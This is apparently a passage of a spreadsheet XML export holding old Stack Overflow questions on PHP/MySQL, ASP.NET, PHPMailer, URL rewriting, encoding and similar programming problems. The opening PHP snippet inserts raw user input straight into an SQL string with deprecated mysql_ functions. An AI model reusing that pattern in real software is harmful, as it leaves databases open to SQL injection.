    mysql_select_db("muradsbi_mydatabase") or die ("Unable to select database.");
    $sqlstatement= "INSERT INTO dbname (name,email) VALUES ('$name','$email')";
    $newquery = mysql_query($sqlstatement, $link);
    echo 'thanks for your register';
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and my &lt;code&gt;NSURLRequst&lt;/code&gt; is created like below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSString *myRequestString = @"&amp;amp;name=Hello%20World&amp;amp;email=Ohai2u";
NSData *myRequestData = [NSData dataWithBytes: [myRequestString UTF8String] length: [myRequestString length]];
NSMutableURLRequest *request = [[NSMutableURLRequest alloc] initWithURL: [NSURL URLWithString: @"http://www.google.com/"]];
[request setHTTPMethod: @"POST"];
[request setHTTPBody: myRequestData];
NSData *returnData = [NSURLConnection sendSynchronousRequest: request returningResponse: nil error: nil];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, this site is unable to get the data from this application and save it to the database, but I know it was connected succussfully because my application is able to get the response data from the server. I don't know whether my variable name is declared in the wrong way or others issues. How can I fix it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strategy for large scale refactoring</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working in a piece of code where both logic and data access are present in the GUI classes. Obviously, I would like to improve on this situation.&lt;/p&gt;
&lt;p&gt;The current current structure is basically:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Big ball of mud&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The ultimate goal is to achieve a DDD-like structure:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;DAL&lt;/li&gt;
&lt;li&gt;Domain model&lt;/li&gt;
&lt;li&gt;Service layer&lt;/li&gt;
&lt;li&gt;Presentation model&lt;/li&gt;
&lt;li&gt;GUI&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, how would you attack the problem?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Big bang
&lt;ul&gt;
&lt;li&gt;Define the structure for the final state and push code to its ultimate home.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Divide and conquer
&lt;ul&gt;
&lt;li&gt;Try to separate the big ball of mud in to two pieces. Repeat until done...&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Strangling
&lt;ul&gt;
&lt;li&gt;Strangle the classes (as described in &lt;a href="http://martinfowler.com/bliki/StranglerApplication.html"&gt;http://martinfowler.com/bliki/StranglerApplication.html&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Setting LinqDataSource bound DropDownList using URL querystring</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a puzzle for me, I am able to get three DropDownLists to behave like a cascade (it fetches the correct data) but where I run into problem is where I try to set the value for the dropdownlist based on the value of the querystring.  &lt;/p&gt;
&lt;p&gt;Only the first dropdownlist seems to take it's value from the querystring.  The other two does not.  In fact the 3rd DropDownlist will also exhibit the error below (it almost looks like the control isn't bound yet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'ddlStation' has a SelectedValue which is invalid because it does not exist in the list of items.
Parameter name: value
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;FYI, here is the portion that sets the DropDownList in the Page_Load event:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// see if there is any querystring and set dropdownlist accordingly
                if (Request.QueryString["cell"] != null)
                {
                    ddlCell.SelectedValue = Request.QueryString["cell"].ToString();
                    if (Request.QueryString["subcell"] != null)
                    {
                        ddlSubCell.SelectedValue = Request.QueryString["subcell"].ToString();
                        if (Request.QueryString["station"] != null)
                        {
                            ddlStation.SelectedValue = Request.QueryString["station"].ToString();
                        }
                    }
                }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any help is appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get username without domain</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an aspx page I get the Windows username with the function &lt;code&gt;Request.LogonUserIdentity.Name&lt;/code&gt;. This function returns a string in the format "domain\user".&lt;/p&gt;
&lt;p&gt;Is there some function to only get the username, without resorting to the &lt;code&gt;IndexOf&lt;/code&gt; and &lt;code&gt;Substring&lt;/code&gt;, like this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static string StripDomain(string username)
{
    int pos = username.IndexOf('\\');
    return pos != -1 ? username.Substring(pos + 1) : username;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Restart ASP.NET application when folder contents change</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a web application that will have "plugins". The plugins will be .DLL files which will export their functionality through predefined interfaces 'n stuff. All the .DLL files are in a folder called "Plugins", and the ASP.NET application loads them all upon startup (by using Assembly.LoadFrom).&lt;/p&gt;
&lt;p&gt;The problem is that when developing, these plugins will change fairly often (all the functionality is in the plugins, the website itself is just a skeleton). Thus, I need a way to automatically restart the application when the .DLL files change.&lt;/p&gt;
&lt;p&gt;How do I do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to resolve this VC++ 6.0 linker error?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a Windows Console application (actually a service) that a previous guy built 4 years ago and is installed and running. I now need to make some changes but can't even build the current version! Here is the build output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;--------------------Configuration: MyApp - Win32 Debug--------------------
Compiling resources...
Compiling...
Main.cpp
winsock.cpp
Linking...
LINK : warning LNK4098: defaultlib "LIBCMTD" conflicts with use of other libs; use /NODEFAULTLIB:library
Main.obj : error LNK2001: unresolved external symbol _socket_dontblock
Debug/MyApp.exe : fatal error LNK1120: 1 unresolved externals
Error executing link.exe.
MyApp.exe - 2 error(s), 1 warning(s)
--------------------------------------------------------------------------
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I use &lt;code&gt;/NODEFAULTLIB&lt;/code&gt; then I get loads of errors. The code does not actually use &lt;code&gt;_socket_noblock&lt;/code&gt; but I can't find anything on it on the 'net. Presumably it is used by some library I am linking to but I don't know what library it is in.&lt;/p&gt;
&lt;p&gt;--- Alistair.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is itemStateChanged on JComboBox is called twice when changed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a JComboBox with an ItemListener on it. When the value is changed, the itemStateChanged event is called twice. The first call, the ItemEvent is showing the original item selected. On the second time, it is showing the item that has been just selected by the user. Here's some tester code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Tester(){
    JComboBox box = new JComboBox();
    box.addItem("One");
    box.addItem("Two");
    box.addItem("Three");
    box.addItem("Four");
    box.addItemListener(new ItemListener(){
        public void itemStateChanged(ItemEvent e){
            System.out.println(e.getItem());
        }
    });
    JFrame frame = new JFrame();
    frame.getContentPane().add(box);
    frame.pack();
    frame.setVisible(true);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So when I changed the Combo box once from "One" to "Three" the console shows:&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;One
Three
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way I can tell using the ItemEvent maybe, that it's the second item (ie. the user selected item)? And if someone can explain why it gets called twice, that would be nice too!&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PowerShell based database synchronisation using a binary file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have written a database application using a binary file as storage. it is accessed via powershell cmdlets.&lt;/p&gt;
&lt;p&gt;You can put information into the database using the put- and you can read information using get-.&lt;/p&gt;
&lt;p&gt;The problem is synchronisation. What is the best way to ensure that the cmdlets don't access the file at the same time?&lt;/p&gt;
&lt;p&gt;The put- must have exclusive access ie no other writers or readers can access the file. The get- doesn't need exclusive access or readers can access the database at the same time.&lt;/p&gt;
&lt;p&gt;Am I best using a file based locking mechanism or a .NET based synchronisation mechanism?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you use SIMBL to develop a plug-in for the iPhone's Safari?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you use SIMBL to develop a plug-in for the iPhone's Safari?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Comparing Infinities in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What does the following expression return in Java?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Math.max(Float.POSITIVE_INFINITY, Double.POSITIVE_INFINITY);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I saw this question in a website and the answer is &lt;code&gt;Double.POSITIVE_INFINITY&lt;/code&gt;.  I'm not sure about this answer as how can we compare 2 infinities? Can someone clarify this?  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating a strip of selectable letters for a form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wish to display a list of letters from a through z on a form.
Each letter needs to be clickable with that value being passed as a click argument.
Aside from creating 26 letters and using the click event of each letter does anyone know of a quick way to do this?
I know how to load dynamic controls etc and how to do it that way. Just wondering if anyone knew of a clever way to do this?&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHPMailer error(s)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;function register_contact ($person = array()) {
	$nogood = false;
	foreach ($person as $val) {
		if (strlen($val)==0) {
			$nogood = true;
			$status = "There was an error sending the registration please fill in all fields";
		}
	}
	if (!$nogood) {
		require_once("class.phpmailer.php");
		$message = "New request for Fox In Touch Recipient:.\r\n\r\n";
		$message .= "Forename: " . $person['fname'];
		$message .= "\r\nSurname: " . $person['sname'];
		$message .= "\r\nEmail: " . $person['email'];
		$message .= "\r\nJob Title: " . $person['job'];
		$message .= "\r\nCompany: " . $person['company'];
		$message .= "\r\n\r\nFox In Touch.";
		$mail = new PHPMailer();
		$mail-&amp;gt;IsSMTP();                                   // send via SMTP
		$mail-&amp;gt;Host     = "ahost"; // SMTP servers
		$mail-&amp;gt;SMTPAuth = true;     // turn on SMTP authentication
		$mail-&amp;gt;Username = "name";  // SMTP username
		$mail-&amp;gt;Password = "pass"; // SMTP password
		//$mail-&amp;gt;Post = 587;
		$mail-&amp;gt;From     = "foxintouch@bionic-comms.co.uk";
		$mail-&amp;gt;FromName = "Fox In Touch";
		//$mail-&amp;gt;AddAddress("foxlicensing.europe@fox.com", "Fox Licensing");
		$mail-&amp;gt;AddAddress("andrew@yahoo.co.uk", "Andrew");
		$mail-&amp;gt;AddReplyTo("foxintouch@bionic-comms.co.uk","Information");
		$mail-&amp;gt;IsHTML(false);                               // send as HTML
		$mail-&amp;gt;Subject  =  "Contact request for Fox In Touch!";
		$mail-&amp;gt;Body     =  $message;
		if(!$mail-&amp;gt;Send()) {
			$nogood = true;
			$status = "Message was not sent &amp;lt;p&amp;gt;";
			$status .= "Mailer Error: " . $mail-&amp;gt;ErrorInfo;
		} else {
			$status = "Thank you! Your message has been sent to 20th Century Fox. Submit another?"; 
		}
	}
	return array('email_failed'=&amp;gt;$nogood, 'status'=&amp;gt;$status);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above code keeps giving me the error, "Mailer Error: Language string failed to load: recipients_failedandrew@yahoo.co.uk". I have tried changing the AddAddress(). The smtp connection settings are correct, as this was the last error i had! Any help would be much appreciated. Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add HTML links in C# TextBox?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I put a link in a C# &lt;code&gt;TextBox&lt;/code&gt;?  I have tried to put HTML tags in the box but instead of showing a link it shows the entire HTML tag.  Can this be done with a &lt;code&gt;TextBox&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to quickly parse a list of strings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I want to split a list of words separated by a delimiter character, I can use&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; 'abc,foo,bar'.split(',')
['abc', 'foo', 'bar']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But how to easily and quickly do the same thing if I also want to handle quoted-strings which can contain the delimiter character ?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;In: 'abc,"a string, with a comma","another, one"'
Out: ['abc', 'a string, with a comma', 'another, one']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Related question: &lt;a href="http://stackoverflow.com/questions/118096/how-can-i-parse-a-comma-delimited-string-into-a-list-caveat"&gt;How can i parse a comma delimited string into a list (caveat)?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>BlackBerry - How to add content to the Home Screen?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the Windows Mobile world you can create a so-called Today plugin that adds content to the phone's main screen -- the one where you see the number of missed calls, unread sms and upcoming events.  Is it possible to do something similar on the BlackBerry?  I'd like to show some important info there, so that they are as visible and as easily reachable as possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Localize Images in ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A couple of years ago, we had a graphic designer revamp our website. His results looked great, but he unfortunately introduced a new unsupported font by the web browser. &lt;/p&gt;
&lt;p&gt;At first I was like, "What!?!"... since most of our content is dynamic and there was no real way to pre-make all of the images. There was also the issue of multiple languages (since we knew Spanish was on the horizon).&lt;/p&gt;
&lt;p&gt;Anyway, I decided to create some classes to auto-generate images via GDI+ and programatically cache them as needed. This solved most of our initial problems. However, now that our load has increased dramatically, there has been a drain on our UI server.&lt;/p&gt;
&lt;p&gt;Now to the question... I am looking to replace most of the dynamic GDI+ images with a standard web browser font. I am thinking of keeping some of the rendered GDI+ images and putting them in a resx file, but plan to replace most of them with Tahoma or Arial fonts via asp:Labels. &lt;/p&gt;
&lt;p&gt;Which have you found to be a better localized image solution? &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Embedding images into the resx&lt;/li&gt;
&lt;li&gt;Only adding the image url into the resx&lt;/li&gt;
&lt;li&gt;Some other solution&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;My main concern is to limit the processing on the UI server. If that is the case, would adding the image url to the resx be a better solution compared to actually embedding the image into the resx?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>URL rewriting problems with ASP .NET 2 on IIS7 and Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a website running under ASP .NET 2/IIS7/Vista. I have a URL rewriting module which allows me to have extensionless URLs. To get this to work I have configured the system.webServer section of the config file such that all requests are forwarded to the aspnet_isapi.dll. I have also added the URL rewrite module to the modules section and set runAllManagedModulesForAllRequests to true.&lt;/p&gt;
&lt;p&gt;When I start up the website and visit one of the pages that uses the URL rewriting, the page is rendered correctly. However if I then visit another page the site stops working and I get a 404 not found. I also find that my breakpoint in the URL rewriting module is not getting hit. It's almost as if IIS forwards the first request to the rewriter, but subsequent ones go somewhere else - the error page mentions Notification as being MapRequestHandler and Handler as being StaticFile.&lt;/p&gt;
&lt;p&gt;If I then make a small change to the web.config file and save it, triggering the website to restart, I can then reload the page in the browser and it all works. Then I click another link and it's broken again.&lt;/p&gt;
&lt;p&gt;For the record, here's a couple of snippets from the config file. First, under system.web:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;httpModules&amp;gt;
  &amp;lt;add name="UrlRewriteModule" type="Arcs.CoopFurniture.TelesalesWeb.UrlRewriteModule, Arcs.CoopFurniture.TelesalesWeb" /&amp;gt;
&amp;lt;/httpModules&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then, under system.webServer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;system.webServer&amp;gt;
  &amp;lt;modules runAllManagedModulesForAllRequests="true"&amp;gt;
    &amp;lt;add name="UrlRewriteModule" type="Arcs.CoopFurniture.TelesalesWeb.UrlRewriteModule, Arcs.CoopFurniture.TelesalesWeb" preCondition="managedHandler" /&amp;gt;
  &amp;lt;/modules&amp;gt;
  &amp;lt;handlers&amp;gt;
    &amp;lt;add name="AspNet" path="*" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework\v2.0.50727\aspnet_isapi.dll" resourceType="Unspecified" requireAccess="None" preCondition="classicMode,runtimeVersionv2.0,bitness32" /&amp;gt;
  &amp;lt;/handlers&amp;gt;
  &amp;lt;validation validateIntegratedModeConfiguration="false" /&amp;gt;
&amp;lt;/system.web&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The site is running under classic rather than integrated pipeline mode.&lt;/p&gt;
&lt;p&gt;Does anyone out there have any ideas? I suspect my configuration is wrong somewhere but I can't seem to find where.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Encoding problem classic ASP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem with classic ASP. The encoding is wrong when I send data with &lt;code&gt;XMLHttp.send&lt;/code&gt;. The response is a PDF file, but the â€œÃ†Ã˜Ã…â€ gets wrong, the â€œÃ˜â€ is read as â€œÃƒÂ¸yâ€  for example. Itâ€™s like itâ€™s a converting mistake from UTF-8 to ISO-8859-1, but it should be  ISO-8859-1 now. I have &lt;code&gt;&amp;lt;%@CODEPAGE="28591"%&amp;gt;&lt;/code&gt; at the top at the page and &lt;code&gt;ISO-8859-1&lt;/code&gt; as encoding in the XML file, I have checked the file so itâ€™s valid ISO-8859-1. I donâ€™t have access to the server I am sending this data to, but I fixed it in a VB6 program which use the same logic with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;aPostBody = StrConv(strBody, vbFromUnicode)
WinHttpReq.SetTimeouts 100000, 100000, 100000, 1000000
WinHttpReq.Send aPostBody
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And in a C# program that also uses the same logic with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ISO-8859-1
byte[] bytes = Encoding.GetEncoding(28591).GetBytes(data);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But in ASP classic I need some help to find a way to change the encoding on a string to ISO-8859-1.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Serializing objects for asynchronous messaging</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm considering using AMQP (using qpid) to enable a mixture of Python and Java services communicate with each other. Basic text messaging seems simple enough but, as with every other messaging technology I've investigated, that's where it seems to stop. Except for building instant messaging applications, I would have thought sending strings wasn't a particularly useful thing to do yet example after example demonstrates sending unformatted text around.&lt;/p&gt;
&lt;p&gt;My instinct then is to use XML (de-)serialization or something similar (JSON, YAML, Protocol Buffers etc.) which has good library support in both languages. Is this a best practice and, if so, which (de-)serialization protocol would people recommend? Or am I missing the point somewhere and should be quite content sending small bits of text?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Server based reuse - DLL, GAC, or REST?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a piece of functionality that is used by several different applications (clients) on the same server. It can best be modeled as a service, has a backend database, and there will only be one version of the functionality and the database in use at any one time.&lt;/p&gt;
&lt;p&gt;Until now we have employed simple DLL-reuse, with the functionality, its configuration file, and dependencies deployed everywhere it is used. Because any changes now have to be made several places, this method is painful when creating new versions of the functionality or when new clients want to use it.&lt;/p&gt;
&lt;p&gt;We are wondering if there is a better way to do this, and have come up with two possible alternatives.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Put the DLL (and the dependencies) in the GAC. The question is then how to configure the component. As the clients have no interest in the configuration, we are leaning towards storing the config file in a hard-coded path on the server.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Publish the functionality as an internal (REST-based) service. Access to it can be limited to internal clients using the firewall.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;As we see it, the pros of #1 seem to be performance and possibly security, whereas #2 can be seen as simpler to set up.&lt;/p&gt;
&lt;p&gt;Are we missing anything important here? Has anybody been in a similar situation before and wants to share some insight?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does this Perl conditional do?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to understand a particular Perl code from &lt;a href="http://sourceforge.net/projects/vcake" rel="nofollow"&gt;vcake&lt;/a&gt;. Usually I find my way around in Perl but the following statement baffles me. I suspect that this is simply an error but I'm not completely sure. The statement is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach my $seq (keys %$set) {
    if( (defined $set-&amp;gt;{$seq}) and (my $numReads &amp;gt;= ($coverage)) ) {
        do something;
    }
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;$coverage&lt;/code&gt; has been defined at the beginning of the file as a scalar integer (e.g. 10) and is never again written to. &lt;code&gt;$numReads&lt;/code&gt; is only used in the line above, &lt;em&gt;nowhere else&lt;/em&gt;!&lt;/p&gt;
&lt;p&gt;&lt;code&gt;$set&lt;/code&gt;, on the other hand, is modified inside the loop so the first part of the condition makes perfect sense. What I don't understand is the second part because as I see it, this will always evaluate to the same value and &lt;strong&gt;I don't understand the significance of &lt;code&gt;$numReads&lt;/code&gt; or &lt;code&gt;&amp;gt;=&lt;/code&gt; here&lt;/strong&gt;. Can someone please enlighten me? Are there perhaps invisible automatic variables involved?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Thread was being aborted</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting a " Thread was being aborted  " Exception in an ASP.NET page.I am not at all using any Response.Redirect/Server.Transfer method.Can any one help me to solve this ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does NSSet objectEnumerator increment the retain count?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After getting the objectEnumerator in the following code, the set1 retain count goes to 3. I was surprised to see that because I didn't expect it to change. I searched the &lt;a href="http://developer.apple.com/documentation/Cocoa/Reference/Foundation/Classes/NSSet_Class/Reference/Reference.html#//apple_ref/occ/instm/NSSet/objectEnumerator" rel="nofollow"&gt;documentation&lt;/a&gt; and can't find where this effect is explained.&lt;/p&gt;
&lt;p&gt;I assume the extra retains are probably set to autorelease by the Cocoa enumeration logic and won't really have any effect in the current event loop. It makes sense the objectEnumerator logic would need a reference to set1 but I'd like to know why they were made. Here is the reason: if I assume set1 has retain count zero after the release in the code then I could try to reuse it another new set. Wouldn't that cause problems since set1 is now pointing at a completely different object/address?&lt;/p&gt;
&lt;p&gt;For "bonus" points, is there a way of enumerating the autorelease pool see what it actually contains? TIA&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#import &amp;lt;Foundation/NSObject.h&amp;gt;
#import &amp;lt;Foundation/NSSet.h&amp;gt;
#import &amp;lt;Foundation/NSValue.h&amp;gt;
#import &amp;lt;Foundation/NSEnumerator.h&amp;gt;
#import &amp;lt;Foundation/NSAutoreleasePool.h&amp;gt;
#import &amp;lt;Foundation/NSString.h&amp;gt;
#import &amp;lt;stdio.h&amp;gt;;
// macro to create an integer number:
#define INTOBJ(v) [NSNumber numberWithInt: v]
int main (int argc, char *argv[])
{
    NSAutoreleasePool *pool = [NSAutoreleasePool new];
    //Make set
    NSMutableSet *set1 = [[NSMutableSet alloc] initWithObjects:
        INTOBJ(1), INTOBJ(2), INTOBJ(5), INTOBJ(10), nil];
    printf("set1 #%lu\n", [set1 retainCount]);
    //Get enumerator of the set. This is where the retain count goes to 3:
    NSEnumerator *setEnum = [set1 objectEnumerator];
    printf("setEnum #%lu\n", [setEnum retainCount]);
    printf("set1 #%lu\n", [set1 retainCount]);
    //Iterate through the collection:
    printf("[");
    NSNumber *element;
    while ((element = [setEnum nextObject]) != nil)
    	//do some this with item. printf is just for debugging:
    	printf(" %i ", [element intValue]);
    printf("]\n");
    printf("set1 #%lu\n", [set1 retainCount]);
    [set1 release];
    printf("set1 after release #%lu\n", [set1 retainCount]);
    //More logic could go here reusing variable set1 since I assumed retain count = 0
    [pool release];
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Namespace Organization - AOP Validators</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have started using aspects for parameter validation in our development framework.  It works nicely, and I enjoy not littering the first half of a public method with validation code.&lt;/p&gt;
&lt;p&gt;What I am wondering is if anyone has any recommendations with where in the namespace structure you would place parameter validation?  Part of me thinks that since it is top level functionality, it should be in the top-level product namespace - much like the way that System is used in the .NET Framework.  I just worry about having the core assembly bloat with more features like this as it goes further down the line.&lt;/p&gt;
&lt;p&gt;As it stands right now, I have them in something like:&lt;/p&gt;
&lt;p&gt;[Company].[Product].ParameterValidators&lt;/p&gt;
&lt;p&gt;In this example, ParameterValidators is the name of the class (aspect) which contains the functionality.&lt;/p&gt;
&lt;p&gt;Apart from this, I would be appreciative if anyone had further recommendations for incorporating aspects into an existing codebase in relation to structural placement.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to fix "Referenced assembly does not have a strong name" error?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've added a weakly named assembly to my &lt;a href="http://en.wikipedia.org/wiki/Microsoft_Visual_Studio#Visual_Studio_2005"&gt;Visual&amp;nbsp;Studio&amp;nbsp;2005&lt;/a&gt; project (which is strongly named). I'm now getting the error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"Referenced assembly 'xxxxxxxx' does not have a strong name"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Do I need to sign this third-party assembly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to write a Web Service for Google App Engine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am simply wondering how to write a Web Service (XML - SOAP) for Google App Engine? I am really new with Python and I have been looking for example for a while, but no chance. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Does anybody could point me out any article or simply could give me an example of a Web Service in Python with Google App Engine?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RewriteRule redirect</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay I have this RewriteRule which is supposed to redirect any request for the file base.css to {folder of .htacces file}/include/style/base.css, but is just keeps redirecting in an infinite loop, I thought the L parameter would make sure that wouldn't happen.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteRule (.*)/base.css$ include/style/base.css [L,NC,R=301]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also it redirects to &lt;a href="http://localhost/C:/somemaps/include/style/base.css" rel="nofollow"&gt;http://localhost/C:/somemaps/include/style/base.css&lt;/a&gt; which it isn't really supposed to do either.&lt;/p&gt;
&lt;p&gt;Can anyone tell me how to fix this?&lt;br /&gt;
Also I would like to have the RewriteRule so it would redirect any file.css to {folder of .htacces file}/include/style/file.css&lt;br /&gt;
BTW the .htacces file is in the root of the website (which is not the root of the server!)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Unicode in C++ source code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the standard encoding of C++ source code? Does the C++ standard even say something about this? Can I write C++ source in Unicode?&lt;/p&gt;
&lt;p&gt;For example, can I use non-ASCII characters such as Chinese characters in comments? If so, is full Unicode allowed or just a subset of Unicode? (e.g., that 16-bit first page or whatever it's called.)&lt;/p&gt;
&lt;p&gt;Furthermore, can I use Unicode for strings? For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Wstring str=L"Strange chars: Ã¢Ã‚ ÄŒÅ¡Ä‘ Ä› â‚¬â‚¬";
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Validation of viewstate MAC failed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently receiving this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;code&gt;&amp;lt;machineKey&amp;gt;&lt;/code&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have found multiple solutions to this error. The solution we are currently using is to add a static MachineKey field at the machine level and to use static validation keys and decryption keys. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;MachineKey validationKey="" decryptionKey="" validation="SHA1" decruption="AES" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Will this solution work for .NET 3.5? Is there a more elegant solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I fix this MySQL query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;SELECT 
  avg(con_hits) as avg_hits 
FROM 
  content 
WHERE 
  con_type = 1 
  AND con_posttime &amp;lt; $twelve_hrs_ago 
  AND con_refresh = 0 
ORDER BY 
  con_posttime DESC 
LIMIT 100
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like it to go to the first record that was posted at least 12 hours ago (denoted by the &lt;code&gt;$twelve_hrs_ago&lt;/code&gt; variable which has the suitable timestamp), and take the average of the &lt;code&gt;con_hits&lt;/code&gt; column, for the next 100 records. In my example, it disregards the &lt;code&gt;LIMIT&lt;/code&gt;, and takes the average of every record in the table.&lt;/p&gt;
&lt;p&gt;Is there a way to bypass that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When should static_cast, dynamic_cast, const_cast and reinterpret_cast be used?</t>
  </si>
  <si>
